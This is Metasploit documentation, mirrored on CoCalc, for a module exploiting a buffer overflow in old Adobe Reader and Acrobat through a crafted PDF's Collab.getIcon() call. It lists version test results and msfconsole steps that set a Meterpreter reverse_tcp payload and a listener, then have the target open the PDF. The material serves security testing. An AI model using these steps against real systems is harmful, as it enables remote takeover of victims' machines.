CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/windows/fileformat/adobe_geticon.md
Views: 1904
Vulnerable Application
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon()
call, an attacker may be able to execute arbitrary code.
Link to vulnerable software OldVersion
Test results (on Windows XP SP3)
reader 7.0.5 - no trigger
reader 7.0.8 - no trigger
reader 7.0.9 - no trigger
reader 7.1.0 - no trigger
reader 7.1.1 - reported not vulnerable
reader 8.0.0 - works
reader 8.1.2 - works
reader 8.1.3 - reported not vulnerable
reader 9.0.0 - works
reader 9.1.0 - reported not vulnerable
Options
FILENAME
The file name
Verification Steps
Install application on the target machine
Start msfconsole
Do:
use exploit/windows/fileformat/adobe_geticon
Do:
set payload [windows/meterpreter/reverse_tcp]
Do:
set LHOST [IP]
Do:
exploit
Do:
use exploit/multi/handler
Do:
set LHOST [IP]
Do:
exploit
Do: Open PDF on target machine with vulnerable software